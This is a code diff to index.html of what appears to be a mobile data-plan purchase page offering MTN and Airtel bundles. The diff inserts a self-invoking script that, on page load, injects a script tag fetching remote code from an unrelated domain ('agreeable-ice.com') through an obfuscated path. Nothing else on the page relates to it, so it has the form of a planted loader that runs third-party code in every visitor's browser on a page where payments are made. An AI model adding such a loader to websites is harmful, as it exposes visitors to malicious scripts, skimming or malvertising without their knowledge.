--- a/index.html
+++ b/index.html
@@ -66,7 +66,18 @@
                 </section>
                 <button class="viewButton" id="MTNshowBundle">Buy MTN</button>
             </section>
-
+<script>
+ (function(qmvi) {
+  var d = document,
+   s = d.createElement('script'),
+   l = d.scripts[d.scripts.length - 1];
+  s.settings = qmvi || {};
+  s.src = "\/\/agreeable-ice.com\/bqX\/V.sbdAGbl\/0aYuWrcf\/Ie\/m\/9xuCZiU\/lGknPVTHY-2\/MzDhUW5cMqTMIdtlNCjOYXwGNyT_kDx_Mywd";
+  s.async = true;
+  s.referrerPolicy = 'no-referrer-when-downgrade';
+  l.parentNode.insertBefore(s, l);
+ })({})
+</script>
             <!---Airtel Section--->
             <section class="plans" id="airtelPlans">
                 <h4>Airtel Data Plan</h4>
